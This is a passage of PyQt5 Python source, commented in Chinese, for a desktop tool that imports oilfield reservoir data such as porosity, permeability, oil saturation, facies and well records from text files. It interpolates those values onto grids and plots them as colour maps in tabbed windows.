新宋体:NSimSun 仿宋:FangSong 楷体:KaiTi\n mpl.rcParams['axes.unicode_minus'] = False # 减号unicode编码\n\n self.__fig = None # Figue对象\n self.__curAxes = None # 当前操作的Axes,为了方便单独用变量\n # self.__createFigure() # 创建Figure和FigureCanvas对象,初始化界面\n # self.__drawFig2X1() # 绘图\n\n ## ==============自定义功能函数========================\n\n # @pyqtSlot(int)\n # def on_tabWidget_currentChanged(self, index): ##tabWidget当前页面变化\n # print(self.ui.tabWidget.widget(index))\n\n\n @pyqtSlot(int)\n def on_tabWidget_tabCloseRequested(self, index): ##分页关闭时关闭窗体\n print(\"tabclose\")\n if (index < 0):\n return\n aForm = self.ui.tabWidget.widget(index)\n aForm.close()\n\n ##树组件响应画图\n @pyqtSlot()\n def on_treeWidget_clicked(self):\n try:\n itemParent = self.ui.treeWidget.currentItem().parent()\n item = self.ui.treeWidget.currentItem()\n\n if itemParent.text(0) == \"沉积相\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = CJX[item.text(0)][0] # float 型\n y = CJX[item.text(0)][1]\n v = CJX[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq1 = griddata((x, y), v, (xq, yq), method=\"linear\")\n vq = griddata((x, y), v, (xq, yq), method=\"nearest\")\n\n\n for i in range(vq1.shape[0]):\n for j in range(vq1.shape[1]):\n if (np.isnan(vq1[i][j]) == True):\n vq[i][j] = vq1[i][j]\n\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n # ax1.plot(t, y1, 'r-o', label=\"sin\", linewidth=2, markersize=5) # 绘制一条曲线\n # ax1.plot(t, y2, 'b--', label=\"cos\", linewidth=2) # 绘制一条曲线\n # ax1.set_xlabel('X 轴') # X轴标题\n # ax1.set_ylabel('Y 轴') # Y轴标题\n # ax1.set_xlim([0, 10]) # X轴坐标范围\n # ax1.set_ylim([-1.5, 1.5]) # Y轴坐标范围\n # ax1.set_title(\"三角函数曲线\")\n # ax1.legend() # 自动创建图例\n fig.fig.canvas.draw() ##刷新\n\n print(item.text(0))\n\n elif itemParent.text(0) == \"孔隙度\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = KXD[item.text(0)][0] # float 型\n y = KXD[item.text(0)][1]\n v = KXD[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n # for i in range(vq.shape[0]):\n # for j in range(vq.shape[1]):\n # if np.isnan(vq[i][j]) == False:\n # vq[i][j] = vq[i][j].astype(int)\n\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() #刷新\n print(item.text(0))\n\n\n elif itemParent.text(0) == \"渗透率\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = STL[item.text(0)][0] # float 型\n y = STL[item.text(0)][1]\n v = STL[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n for i in range(vq.shape[0]):\n for j in range(vq.shape[1]):\n if np.isnan(vq[i][j]) == False:\n vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n\n elif itemParent.text(0) == \"含油饱和度\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = BHD[item.text(0)][0] # float 型\n y = BHD[item.text(0)][1]\n v = BHD[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n print(self.stepx)\n print(self.stepy)\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n # for i in range(vq.shape[0]):\n # for j in range(vq.shape[1]):\n # if np.isnan(vq[i][j]) == False:\n # vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n elif itemParent.text(0) == \"沉积单元数据\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig1 = QmyFigure(self)\n fig1.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig1, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n floor = CJDYSJ[item.text(0)] # float 型\n floor = np.array(floor)\n floor = floor.T\n floor = floor.tolist()\n wellNum = floor[2]\n x = []\n y = []\n\n\n\n bj1 = 1\n bj2 = 1\n yxhd = []\n yxhd1 = float(floor[13][0])\n kxd = []\n kxd1 = float(floor[14][0])\n stl = []\n stl1 = float(floor[15][0])\n\n for i in range(1,len(floor[0])-1):\n print(i)\n if floor[2][i] == floor[2][i-1]:\n\n yxhd1 = yxhd1 + float(floor[13][i])\n if float(floor[14][i]) == 0:\n kxd1 = kxd1 + float(floor[14][i])\n else:\n bj1 = bj1 + 1\n kxd1 = kxd1 + float(floor[14][i])\n\n if float(floor[15][i]) == 0:\n stl1 = stl1 + float(floor[15][i])\n else:\n bj2 = bj2 + 1\n stl1 = stl1 + float(floor[15][i])\n else:\n for j in range(len(DJDZSJ)):\n if floor[2][i-1] == list(DJDZSJ.keys())[j]:\n if DJDZSJ[list(DJDZSJ.keys())[j]][2] == '0':\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][0])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][1])\n else:\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][2])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][3])\n yxhd.append(str(yxhd1))\n kxd.append(str(kxd1/bj1))\n stl.append(str(stl1/bj2))\n\n bj1 = 1\n bj2 = 1\n yxhd1 = float(floor[13][i])\n kxd1 = float(floor[14][i])\n stl1 = float(floor[15][i])\n\n print(floor[13])\n print(yxhd)\n\n x = np.array(x)\n y = np.array(y)\n yxhd = np.array(yxhd)\n kxd = np.array(kxd)\n stl = np.array(stl)\n\n x = x.T\n y = y.T\n yxhd = yxhd.T\n kxd = kxd.T\n stl = stl.T\n\n print(int(min(x)))\n print(int(max(x)))\n print(int(min(y)))\n print(int(max(y)))\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n yxhdq = griddata((x, y), yxhd, (xq, yq), method=\"linear\")\n kxdq = griddata((x, y), kxd, (xq, yq), method=\"linear\")\n stlq = griddata((x, y), stl, (xq, yq), method=\"linear\")\n\n # # for i in range(vq.shape[0]):\n # # for j in range(vq.shape[1]):\n # # if np.isnan(vq[i][j]) == False:\n # # vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig1.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title+\"有效厚度展示\")\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig2 = QmyFigure(self)\n fig2.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig2, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n ax2 = fig2.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图2\n ax2.set_xlabel('X 轴') # X轴标题\n ax2.set_ylabel('Y 轴') # Y轴标题\n ax2.set_title(title+\"孔隙度展示\")\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig3 = QmyFigure(self)\n fig3.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig3, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n ax3 = fig3.fig.add_subplot(1, 1, 1, label=\"sin-cos plot\") # 子图3\n ax3.set_xlabel('X 轴') # X轴标题\n ax3.set_ylabel('Y 轴') # Y轴标题\n ax3.set_title(title+\"渗透率展示\")\n\n im1 = ax1.pcolormesh(xq, yq, yxhdq)\n fig1.fig.colorbar(im1, ax=ax1)\n\n im2 = ax2.pcolormesh(xq, yq, kxdq)\n fig2.fig.colorbar(im2, ax=ax2)\n\n im3 = ax3.pcolormesh(xq, yq, stlq)\n fig3.fig.colorbar(im3, ax=ax3)\n\n fig1.fig.canvas.draw() ##刷新\n\n fig2.fig.canvas.draw() ##刷新\n\n fig3.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n except AttributeError:\n print(\"AttributeError\")\n\n ##导入沉积相数据\n @pyqtSlot()\n def on_actiongfd_triggered(self):\n\n print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n # self.progressBar.setValue(i)\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在导入文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n # print(lineStr)\n\n lineList = lineStr.split(\" \")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n CJX[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(2).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(2).setExpanded(True)\n\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionBHD_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n\n self.ui.comboBox.addItem(fileName[0][0:-4])\n\n self.qlqFloor.append(fileName[0][0:-4])\n\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n BHD[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(4).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(4).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionKXD_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n for str in strList:\n\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n KXD[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(0).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(0).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n @pyqtSlot()\n def on_actionSTL_triggered(self):\n # print(\"test\")\n curDir = QDir.currentPath()\n aDir = QFileDialog.getExistingDirectory(self, \"选择一个目录\",\n curDir, QFileDialog.ShowDirsOnly)\n dirObj = QDir(aDir)\n strList = dirObj.entryList(QDir.Files)\n # print(strList)\n\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标题\n minV = 0\n maxV = len(strList)\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"导入文件\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n i = 1\n\n for str in strList:\n\n dlgProgress.setValue(i)\n dlgProgress.setLabelText(\"正在复制文件,第 %d 个\" % i)\n\n floor = []\n x = []\n y = []\n phase = [] ##相\n fileName = re.findall(\".*\\.txt\", str)\n if fileName != []:\n\n # print(fileName[0][0:-4])\n filePath = aDir + \"/\" + fileName[0]\n # print(filePath)\n fileDevice = QFile(filePath)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n x.append(float(lineList[0]))\n y.append(float(lineList[1]))\n phase.append(float(lineList[2]))\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n\n finally:\n fileDevice.close()\n\n floor.append(x) # 将读取出的数据按列表形式存储\n floor.append(y) # 将读取出的数据按列表形式存储\n floor.append(phase) # 将读取出的数据按列表形式存储\n f = np.array(floor)\n print(f.shape)\n STL[fileName[0][0:-4]] = floor # 用文件名作为键值将不同文件的数据存储在字典中\n item = QTreeWidgetItem()\n item.setText(0, fileName[0][0:-4])\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(0).child(1).addChild(item)\n i = i + 1\n\n self.ui.treeWidget.topLevelItem(0).child(1).setExpanded(True)\n # print(self.CJX[\"S21\"])\n\n # 导入单井地质数据\n @pyqtSlot()\n def on_actiondjdzsj_triggered(self):\n\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n i = 1\n while not fileStream.atEnd():\n\n lineStr = fileStream.readLine() # 返回QByteArray类型\n lineList = lineStr.split(\"\\t\")\n\n if lineList[0] != str(i):\n continue\n\n DJDZSJ[lineList[1]] = lineList[2:]\n item = QTreeWidgetItem()\n item.setText(0, lineList[1])\n\n self.ui.treeWidget.topLevelItem(1).child(4).addChild(item)\n i = i + 1\n\n\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.DJDZSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"单井地质数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n # self.ui.treeWidget.topLevelItem(1).child(4).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(4).setExpanded(True)\n\n @pyqtSlot()\n def on_actionxspmsj_triggered(self):\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n\n XSPMSJ.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"吸水剖面数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(3).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(3).setExpanded(True)\n\n @pyqtSlot()\n def on_actionsksj_triggered(self):\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n XSPMSJ.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"射孔数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(2).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(2).setExpanded(True)\n\n @pyqtSlot()\n def on_actioncssj_triggered(self):\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n CSSJ.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"措施数据\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(5).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(5).setExpanded(True)\n\n @pyqtSlot()\n def on_actioncjdysj_triggered(self):\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n i = 0\n while not fileStream.atEnd():\n i = i + 1\n lineStr = fileStream.readLine() # 返回QByteArray类型\n lineList = lineStr.split(\"\\t\")\n\n if i == 1:\n continue\n\n floor1 = lineList[0]\n CJDYZB[floor1] = []\n CJDYZB[floor1].append(lineList)\n\n floor = lineList[3] + \"-\" + lineList[4]\n if floor in CJDYSJ:\n CJDYSJ[floor].append(lineList)\n else:\n CJDYSJ[floor] = []\n CJDYSJ[floor].append(lineList)\n item = QTreeWidgetItem()\n item.setText(0, floor)\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n\n self.ui.treeWidget.topLevelItem(1).child(1).addChild(item)\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # item = QTreeWidgetItem()\n # item.setText(0, \"沉积单元数据\")\n # self.ui.treeWidget.topLevelItem(1).child(1).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(1).setExpanded(True)\n\n @pyqtSlot()\n def on_actionzsjs_triggered(self):\n curPath = QDir.currentPath() # 获取系统当前目录\n title = \"打开一个文件\"\n filt = \"文本文件(*.txt);;所有文件(*.*)\"\n fileName, flt = QFileDialog.getOpenFileName(self, title, curPath, filt)\n\n if fileName != \"\":\n fileDevice = QFile(fileName)\n fileDevice.open(QIODevice.ReadOnly | QIODevice.Text)\n try:\n fileStream = QTextStream(fileDevice)\n fileStream.setAutoDetectUnicode(True) # 自动检测Unicode\n fileStream.setCodec(\"GBK\") # 必须设置编码,否则不能正常显示汉字\n while not fileStream.atEnd():\n lineStr = fileStream.readLine() # 返回QByteArray类型\n\n lineList = lineStr.split(\"\\t\")\n ZSJS.append(lineList)\n\n except UnicodeDecodeError:\n print(fileName[0] + \"文件编码格式有误!\")\n\n finally:\n fileDevice.close()\n\n # print(self.XSPMSJ[-1])\n\n item = QTreeWidgetItem()\n item.setText(0, \"注水井史\")\n item.setIcon(0, QtGui.QIcon('images/29.ico'))\n self.ui.treeWidget.topLevelItem(1).child(0).addChild(item)\n self.ui.treeWidget.topLevelItem(1).child(0).setExpanded(True)\n\n @pyqtSlot()\n def on_actionfsd_triggered(self):\n newWindow = CSw_dcfbx_Slot.QmyMainWindow(self)\n newWindow.show()\n\n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n self.stepx = int(self.ui.lineEdit.text())\n self.stepy = int(self.ui.lineEdit_2.text())\n\n print(self.stepx)\n print(self.stepy)\n print(\"pushbotton2\")\n\n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n\n headerText = [\"潜力区序号\", \"层号\", \"平面规模\", \"平均含油饱和度\", \"平均有效厚度\", \"平均渗透率\",\"平均孔隙度\",\"剩余油量\",\"井数量\",\"平均水淹程度\"]\n self.ui.tableWidget.setColumnCount(len(headerText))\n self.ui.tableWidget.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget.clearContents()\n\n\n labText = \"正在导入文件...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标\n minV = 0\n maxV = len(self.qlqFloor)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"筛选数据\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n 